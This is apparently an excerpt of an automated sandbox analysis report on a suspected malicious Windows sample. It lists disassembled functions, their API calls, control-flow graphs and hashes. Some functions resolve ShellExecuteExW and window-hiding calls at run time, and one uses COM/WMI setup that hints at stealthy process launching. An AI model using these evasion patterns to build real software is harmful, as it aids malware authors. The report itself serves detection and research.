                                        • Instruction Fuzzy Hash: B2E04631000A08ABCF02BF58DC58A493BA9FF14353F088020FD09CB163DB39DC46CA90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 8f92c3659f25898acd4e3c4257262f67a32b11aed3702297e17542cbf183e925
                                        • Instruction ID: 45113c1beff6da560067752be8e2ef75195144d89f97b75d3f190864107f4ee1
                                        • Opcode Fuzzy Hash: 8f92c3659f25898acd4e3c4257262f67a32b11aed3702297e17542cbf183e925
                                        • Instruction Fuzzy Hash: 2AA00270505602CB57404F355D0570F3695754569670591759515C6161E76844505F51
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 026343969d9766ef2b8ec58364c0306f94746e60bf6072c1b5685626d48a7f8e
                                        • Instruction ID: 1b9fe244800136fe6351165a572e9c02f6d0c6e4c3be10f501cd95dea462afb3
                                        • Opcode Fuzzy Hash: 026343969d9766ef2b8ec58364c0306f94746e60bf6072c1b5685626d48a7f8e
                                        • Instruction Fuzzy Hash: 2AE01275A44644AFCB15CF54D841F15B7E8FB09B21F14466DEC16C7790DB35A8008A40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 214 851320-851385 CoInitializeSecurity 215 851852-851875 call 8523ea 214->215 216 85138b-8513a8 214->216 216->215 220 8513ae-851401 call 852400 216->220 223 851427 220->223 224 851403-85141b SysAllocString 220->224 226 851429-851432 223->226 225 85141d-851422 call 852040 224->225 224->226 225->223 228 851434-851439 call 852040 226->228 229 85143e-85146f InterlockedDecrement 226->229 228->229 232 8514a6-8514aa 229->232 233 851471-851475 229->233 234 851724-851730 232->234 235 8514b0-8514c9 CoSetProxyBlanket 232->235 236 851484-851489 233->236 237 851477-85147e SysFreeString 233->237 234->215 238 851736-85173c 234->238 235->234 239 8514cf-85154b SysAllocString 235->239 240 85149b-8514a3 call 8526b8 236->240 241 85148b-851494 call 8523fb 236->241 237->236 238->215 243 851557-85156b SysAllocString 239->243 244 85154d-851552 call 851030 239->244 240->232 241->240 249 851577-8515cc SysAllocString 243->249 250 85156d-851572 call 851030 243->250 244->243 256 8515ce-8515d3 call 851030 249->256 257 8515d8-8515f4 VariantClear 249->257 250->249 256->257 259 8515f6-8515f7 call 851030 257->259 260 8515fc-851623 SysStringByteLen SysAllocStringByteLen 257->260 259->260 262 851645-8516b0 260->262 263 851625-851640 call 851030 260->263 267 8516b6-8516bf 262->267 268 851741-851779 VariantInit 262->268 263->262 269 8516c7-8516ce 267->269 270 8516c1-8516c3 267->270 273 8517c4-8517da VariantClear 268->273 274 85177b-851787 268->274 272 8516d5-8516f4 SysFreeString * 2 269->272 270->269 280 8516f6-8516f8 272->280 281 8516fc-851708 272->281 276 8517e2-85180e VariantClear SysFreeString * 2 273->276 277 8517dc-8517de 273->277 274->273 275 851789-8517aa 274->275 287 8517b2-8517bf VariantClear 275->287 288 8517ac-8517ae 275->288 283 851816-851822 276->283 284 851810-851812 276->284 277->276 280->281 285 851710-85171c 281->285 286 85170a-85170c 281->286 289 851824-851826 283->289 290 85182a-851836 283->290 284->283 285->234 291 85171e-851720 285->291 286->285 287->272 288->287 289->290 292 85183e-85184a 290->292 293 851838-85183a 290->293 291->234 292->215 294 85184c-85184e 292->294 293->292 294->215
                                        APIs
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,3B4B4A20), ref: 0085137D
                                        • CoCreateInstance.OLE32(0085F378,00000000,00000001,0085F2A8,?), ref: 008513A0
                                        • new.LIBCMT ref: 008513E8
                                        • SysAllocString.OLEAUT32(004F0052), ref: 00851415
                                        • _com_issue_error.COMSUPP ref: 00851422
                                        • _com_issue_error.COMSUPP ref: 00851439
                                        • InterlockedDecrement.KERNEL32(00000008), ref: 00851467
                                        • SysFreeString.OLEAUT32 ref: 00851478
                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008514C1
                                        • SysAllocString.OLEAUT32(?), ref: 0085153F
                                        • SysAllocString.OLEAUT32(00690057), ref: 0085155F
                                        • SysAllocString.OLEAUT32(00867348), ref: 008515C1
                                        • VariantClear.OLEAUT32(?), ref: 008515EC
                                        • SysStringByteLen.OLEAUT32(00000000), ref: 0085160B
                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00851615
                                        • SysFreeString.OLEAUT32(00000000), ref: 008516E6
                                        • SysFreeString.OLEAUT32(00000000), ref: 008516E9
                                        • VariantInit.OLEAUT32(?), ref: 00851752
                                        • VariantClear.OLEAUT32(?), ref: 008517B9
                                        • VariantClear.OLEAUT32(?), ref: 008517CB
                                        • VariantClear.OLEAUT32(?), ref: 008517E9
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851800
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851803
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: String$AllocFreeVariant$Clear$Byte_com_issue_error$BlanketCreateDecrementInitInitializeInstanceInterlockedProxySecurity
                                        • String ID: Pou$ReturnValue
                                        • API String ID: 1902500518-3391372667
                                        • Opcode ID: 65412166920c73155a6fd56830ceb4f027c7e756f1b24ad212263fa896fb654a
                                        • Instruction ID: f07040607aa6242ad6a4e232e7b0719d8d3e6049926ff62b5f68329e48fbd4a9
                                        • Opcode Fuzzy Hash: 65412166920c73155a6fd56830ceb4f027c7e756f1b24ad212263fa896fb654a
                                        • Instruction Fuzzy Hash: 2DF11C70A00348EBEF20DFA5CC48B9EBBB9FF45705F208198E945EB291DB759948CB51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 295 851280-85128f 296 851291-851299 GetProcAddress 295->296 297 85129b 295->297 298 85129d-8512a5 296->298 297->298 299 8512a7-8512af GetProcAddress 298->299 300 8512b1 298->300 301 8512b3-8512ba 299->301 300->301 302 8512c6 301->302 303 8512bc-8512c4 GetProcAddress 301->303 304 8512c8-8512cf 302->304 303->304 305 8512d1-8512d9 GetProcAddress 304->305 306 8512db 304->306 307 8512dd-8512e4 305->307 306->307 308 8512e6-8512ee GetProcAddress 307->308 309 8512f0 307->309 310 8512f2-8512f9 308->310 309->310 311 851309-851312 310->311 312 8512fb-851308 GetProcAddress 310->312
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 00851297
                                        • GetProcAddress.KERNEL32(?,ShellExecuteExW), ref: 008512AD
                                        • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 008512C2
                                        • GetProcAddress.KERNEL32(00000000,GetConsoleWindow), ref: 008512D7
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 008512EC
                                        • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00851301
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID: CloseHandle$GetConsoleWindow$GetEnvironmentVariableW$GetModuleFileNameW$ShellExecuteExW$ShowWindow
                                        • API String ID: 190572456-122698628
                                        • Opcode ID: 903a99839022d14b759150f795fdc7f04fd3be56b2d6875b2d6243a635d2788f
                                        • Instruction ID: fbd83e5969ef34bc94dca497993c0d2fdcab6018c380c702f50806d7350dd035
                                        • Opcode Fuzzy Hash: 903a99839022d14b759150f795fdc7f04fd3be56b2d6875b2d6243a635d2788f
                                        • Instruction Fuzzy Hash: 41110C70750704AACBB0DF3DDC48B13B7E8FF44745B25092DA899D3A40E7B4E9448B20

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 313 8595ee-859602 314 859604-859609 313->314 315 859670-859678 313->315 314->315 316 85960b-859610 314->316 317 8596bf-8596d7 call 859761 315->317 318 85967a-85967d 315->318 316->315 319 859612-859615 316->319 328 8596da-8596e1 317->328 318->317 321 85967f-8596bc call 856a79 * 4 318->321 319->315 322 859617-85961f 319->322 321->317 326 859621-859624 322->326 327 859639-859641 322->327 326->327 332 859626-859638 call 856a79 call 8591ad 326->332 330 859643-859646 327->330 331 85965b-85966f call 856a79 * 2 327->331 333 859700-859704 328->333 334 8596e3-8596e7 328->334 330->331 336 859648-85965a call 856a79 call 8592ab 330->336 331->315 332->327 337 859706-85970b 333->337 338 85971c-859728 333->338 341 8596fd 334->341 342 8596e9-8596ec 334->342 336->331 345 85970d-859710 337->345 346 859719 337->346 338->328 348 85972a-859737 call 856a79 338->348 341->333 342->341 350 8596ee-8596fc call 856a79 * 2 342->350 345->346 353 859712-859718 call 856a79 345->353 346->338 350->341 353->346
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 00859632
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591CA
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591DC
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008591EE
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859200
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859212
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859224
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859236
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859248
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085925A
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085926C
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 0085927E
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 00859290
                                          • Part of subcall function 008591AD: _free.LIBCMT ref: 008592A2
                                        • _free.LIBCMT ref: 00859627
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 00859649
                                        • _free.LIBCMT ref: 0085965E
                                        • _free.LIBCMT ref: 00859669
                                        • _free.LIBCMT ref: 0085968B
                                        • _free.LIBCMT ref: 0085969E
                                        • _free.LIBCMT ref: 008596AC
                                        • _free.LIBCMT ref: 008596B7
                                        • _free.LIBCMT ref: 008596EF
                                        • _free.LIBCMT ref: 008596F6
                                        • _free.LIBCMT ref: 00859713
                                        • _free.LIBCMT ref: 0085972B
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 6c16c54741539a671f5c916de1f85fc59b1d73cf6530337925734765f1c0bfd3
                                        • Instruction ID: 6de07cda4199215f3ddf71d81f647d6b577ce4f61e304e1a9f3bfe6516d36ca3
                                        • Opcode Fuzzy Hash: 6c16c54741539a671f5c916de1f85fc59b1d73cf6530337925734765f1c0bfd3
                                        • Instruction Fuzzy Hash: 7E314F31500201EFDB21AE79D845B6A73E9FF10362F54841EE899D7161EF31AC9CCB61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 370 8511a0-8511e5 GetModuleHandleW 371 8511e7-8511ee GetProcAddress 370->371 372 8511f0 370->372 373 8511f2-85121e 371->373 372->373 377 851220-851228 GetProcAddress 373->377 378 85122a 373->378 379 85122c-85123b call 851280 377->379 378->379 382 85123d-851259 GetProcAddress call 8523ea 379->382 383 85125a-851272 call 8523ea 379->383
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32), ref: 008511B9
                                        • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 008511EC
                                        • GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00851226
                                        • GetProcAddress.KERNEL32(41797261,CoInitialize), ref: 00851243
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CoInitialize$KERNEL32$LoadLibraryA$OLE32$SHELL32$USER32$wsprintfW
                                        • API String ID: 667068680-4279566152
                                        • Opcode ID: 996b647f919f4035732f1baf50b71323133536ebae47282aa78a2422f1b2bfb1
                                        • Instruction ID: 2fe8f030bb0adf4057a40601d0d9ca181e357a6831af489c15b350b8b3386d01
                                        • Opcode Fuzzy Hash: 996b647f919f4035732f1baf50b71323133536ebae47282aa78a2422f1b2bfb1
                                        • Instruction Fuzzy Hash: 60216A70A007049FCB60DFB9D905B6AB7F4FF48711B01496EE85AD3740EA74EA088B61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 388 856eff-856f10 389 856f12-856f1b call 856a79 388->389 390 856f1c-856fa7 call 856a79 * 9 call 856dc5 call 856e15 388->390 389->390
                                        APIs
                                        • _free.LIBCMT ref: 00856F13
                                          • Part of subcall function 00856A79: HeapFree.KERNEL32(00000000,00000000,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?), ref: 00856A8F
                                          • Part of subcall function 00856A79: GetLastError.KERNEL32(?,?,00859342,?,00000000,?,00000000,?,00859369,?,00000007,?,?,00859786,?,?), ref: 00856AA1
                                        • _free.LIBCMT ref: 00856F1F
                                        • _free.LIBCMT ref: 00856F2A
                                        • _free.LIBCMT ref: 00856F35
                                        • _free.LIBCMT ref: 00856F40
                                        • _free.LIBCMT ref: 00856F4B
                                        • _free.LIBCMT ref: 00856F56
                                        • _free.LIBCMT ref: 00856F61
                                        • _free.LIBCMT ref: 00856F6C
                                        • _free.LIBCMT ref: 00856F7A
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 32562305491dea9a2102bd42d36dfe4f15f82996e2e7cbf6effe74db25c55cbb
                                        • Instruction ID: 5473c9e69b98caf0a20d70de8307f0a62419a4170c030ff4002ec9bc214ee1b9
                                        • Opcode Fuzzy Hash: 32562305491dea9a2102bd42d36dfe4f15f82996e2e7cbf6effe74db25c55cbb
                                        • Instruction Fuzzy Hash: 9D117A75500118EFCB02EFD9D842CD93B75FF043A1B9180A6BE089F132E631DAA89B41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 415 85b24a-85b27c 416 85b2a0-85b2a3 415->416 417 85b27e-85b28b call 85b10b 415->417 419 85b2a5-85b2a7 416->419 420 85b28c-85b291 416->420 417->420 424 85b4de-85b4f1 call 8523ea 419->424 422 85b293-85b29e call 85b10b 420->422 423 85b2ac-85b2af 420->423 427 85b2b1-85b2b6 422->427 423->419 423->427 430 85b2c3-85b2c5 427->430 431 85b2b8-85b2c0 427->431 432 85b2c7-85b2c9 430->432 433 85b2cf-85b2d1 430->433 431->430 432->433 434 85b36c-85b384 MultiByteToWideChar 432->434 435 85b2d3 433->435 436 85b2db-85b2de 433->436 434->419 439 85b38a-85b396 434->439 440 85b2d5-85b2d6 435->440 437 85b2e0-85b2e3 436->437 438 85b2e8-85b2eb 436->438 437->424 441 85b2f1-85b2fe GetCPInfo 438->441 442 85b2ed-85b2ef 438->442 443 85b3f1-85b3f3 439->443 444 85b398-85b3a9 439->444 440->424 441->419 446 85b300-85b302 441->446 442->440 445 85b3f6-85b3f8 443->445 447 85b3cb-85b3d1 444->447 448 85b3ab-85b3bd call 852930 444->448 449 85b4d2 445->449 450 85b3fe-85b414 MultiByteToWideChar 445->450 451 85b304-85b30a 446->451 452 85b333-85b335 446->452 454 85b3d2 call 856ab3 447->454 448->449 464 85b3c3-85b3c9 448->464 458 85b4d5-85b4dc call 859551 449->458 450->449 455 85b41a-85b42e MultiByteToWideChar 450->455 451->442 456 85b30c-85b313 451->456 452->434 459 85b337-85b33d 452->459 460 85b3d7-85b3dd 454->460 455->449 462 85b434-85b440 455->462 456->442 463 85b315-85b31a 456->463 458->424 459->437 466 85b33f-85b346 459->466 460->449 461 85b3e3 460->461 468 85b3e9-85b3ef 461->468 469 85b442-85b453 462->469 470 85b48c 462->470 463->442 471 85b31c-85b320 463->471 464->468 466->437 467 85b348 466->467 473 85b34b-85b350 467->473 468->445 475 85b455-85b464 call 852930 469->475 476 85b46e-85b474 469->476 474 85b48e-85b490 470->474 477 85b322-85b324 471->477 478 85b32a-85b32f 471->478 473->437 479 85b352-85b356 473->479 480 85b4c6 474->480 481 85b492-85b4a7 MultiByteToWideChar 474->481 475->480 494 85b466-85b46c 475->494 484 85b475 call 856ab3 476->484 477->424 477->478 478->463 483 85b331 478->483 485 85b360-85b365 479->485 486 85b358-85b35a 479->486 488 85b4c9-85b4d0 call 859551 480->488 481->480 487 85b4a9-85b4c4 call 8573af 481->487 483->442 490 85b47a-85b47f 484->490 485->473 491 85b367 485->491 486->424 486->485 487->488 488->458 490->480 495 85b481 490->495 491->437 496 85b487-85b48a 494->496 495->496 496->474
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?), ref: 0085B2F6
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0085B379
                                        • __alloca_probe_16.LIBCMT ref: 0085B3B1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B40C
                                        • __alloca_probe_16.LIBCMT ref: 0085B45B
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0085B423
                                          • Part of subcall function 00856AB3: HeapAlloc.KERNEL32(00000000,?,?,?,0085242C,?,?,008510CE,0000000C,3B4B4A20,?,?,?,?,0085E95F,000000FF), ref: 00856AE5
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B49F
                                        • __freea.LIBCMT ref: 0085B4CA
                                        • __freea.LIBCMT ref: 0085B4D6
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                        • String ID:
                                        • API String ID: 3256262068-0
                                        • Opcode ID: 94ee91eb3df0b0ae967e9ac50f773aa1b4378e93343a77e502ed3f2ea24585b3
                                        • Instruction ID: f39746e9a5706abc50ce442d1464e4ee367361b1776543eda1c033a3140f2831
                                        • Opcode Fuzzy Hash: 94ee91eb3df0b0ae967e9ac50f773aa1b4378e93343a77e502ed3f2ea24585b3
                                        • Instruction Fuzzy Hash: 0991D471E0021A9FDF208E65CC81AEE7BA5FF29752F184559EC04E7241E734CC48C765

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 499 85858c-85859a 500 8585ac-8585bf call 85e6e0 499->500 501 85859c-8585aa call 8556ad 499->501 506 8585c1-8585c3 500->506 507 85860f-858614 call 8556ad 500->507 508 858628-85862c 501->508 506->507 509 8585c5-8585db 506->509 514 85861a 507->514 511 8585dd-8585e9 call 8587c7 509->511 512 8585ef-8585f3 509->512 511->512 516 858687-85869c call 858878 512->516 517 8585f9-8585fc 512->517 518 85861d-858627 call 856a79 514->518 529 8586e6-8586e9 516->529 530 85869e-8586a0 516->530 521 85862d-85862f 517->521 522 8585fe-858604 517->522 518->508 525 858635-858637 521->525 526 858631-858633 521->526 522->521 527 858606-85860d call 856143 522->527 531 858639 call 856b44 525->531 526->518 527->507 540 85867d 527->540 529->518 533 8586ef-8586f9 529->533 530->529 534 8586a2-8586b1 call 856a79 530->534 535 85863e-858654 call 856a79 531->535 533->514 537 8586ff-858705 533->537 546 8586c5-8586c8 534->546 547 8586b3-8586bb 534->547 535->514 548 858656-85865c 535->548 537->514 542 85870b-858721 call 8556c5 call 856a79 537->542 541 858683-858685 540->541 541->514 541->516 542->514 565 858727-858732 542->565 552 8586bd-8586c4 546->552 553 8586ca-8586e2 call 8556c5 call 856a79 546->553 550 85873c-85873f 547->550 548->541 551 85865e-858660 548->551 550->518 556 858745-858747 550->556 555 858662 call 856b44 551->555 552->546 553->550 571 8586e4 553->571 561 858667-85867b call 856a79 555->561 558 85874a-85874f 556->558 558->558 563 858751-858759 558->563 561->514 561->540 567 85875c call 856b44 563->567 569 858736 565->569 570 858761-858767 567->570 569->550 572 8587b0-8587b7 call 856a79 570->572 573 858769-85877a call 856a1f 570->573 571->569 572->518 578 8587bc 573->578 579 85877c-8587a0 SetEnvironmentVariableA 573->579 581 8587c1 call 855601 578->581 579->572 580 8587a2-8587aa call 8556ad 579->580 580->572 582 8587c6 581->582
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: fa356ceb46c39db9710ccd8d64b4f3362bd906246e4f0ed21b0c3836c18f2e01
                                        • Instruction ID: e16f78bcd4de5798e0c76d67c9a87059d541dff3d769e9758e767d193c68ed91
                                        • Opcode Fuzzy Hash: fa356ceb46c39db9710ccd8d64b4f3362bd906246e4f0ed21b0c3836c18f2e01
                                        • Instruction Fuzzy Hash: 93611475900340EFCB21AFB8C84566A7BE4FF15362B54416FED00F7282FE7289088B52
                                        APIs
                                        • _com_issue_error.COMSUPP ref: 00852204
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,008519EF,?,00000000,00000000,?,?,?,?,?,008519EF), ref: 00852213
                                        • GetLastError.KERNEL32(?,?,?,?,?,008519EF), ref: 0085222E
                                        • _com_issue_error.COMSUPP ref: 00852241
                                        • SysAllocString.OLEAUT32(00000000), ref: 00852247
                                        • _com_issue_error.COMSUPP ref: 00852269
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$AllocByteCharErrorLastMultiStringWide
                                        • String ID: JK;
                                        • API String ID: 1412949955-1593640926
                                        • Opcode ID: 274e30d82183aaa92bddd2b89e873c1997e2cbe5a95f2f26edc35c8f06cd650a
                                        • Instruction ID: e4e2323869be25419c4bdd4b1837e304346f7271d2b5158651aff088cd27647b
                                        • Opcode Fuzzy Hash: 274e30d82183aaa92bddd2b89e873c1997e2cbe5a95f2f26edc35c8f06cd650a
                                        • Instruction Fuzzy Hash: 4A110C7AB0161497CB205FA89C45B9FB764FF09323F404125FD05F7291DF29A848C6E6
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,008583CC,00000000,?,?,?,0085ABE4,?,?,00000100), ref: 0085A9ED
                                        • __alloca_probe_16.LIBCMT ref: 0085AA25
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0085ABE4,?,?,00000100,5EFC4D8B,?,?), ref: 0085AA73
                                        • __alloca_probe_16.LIBCMT ref: 0085AB0A
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0085AB6D
                                        • __freea.LIBCMT ref: 0085AB7A
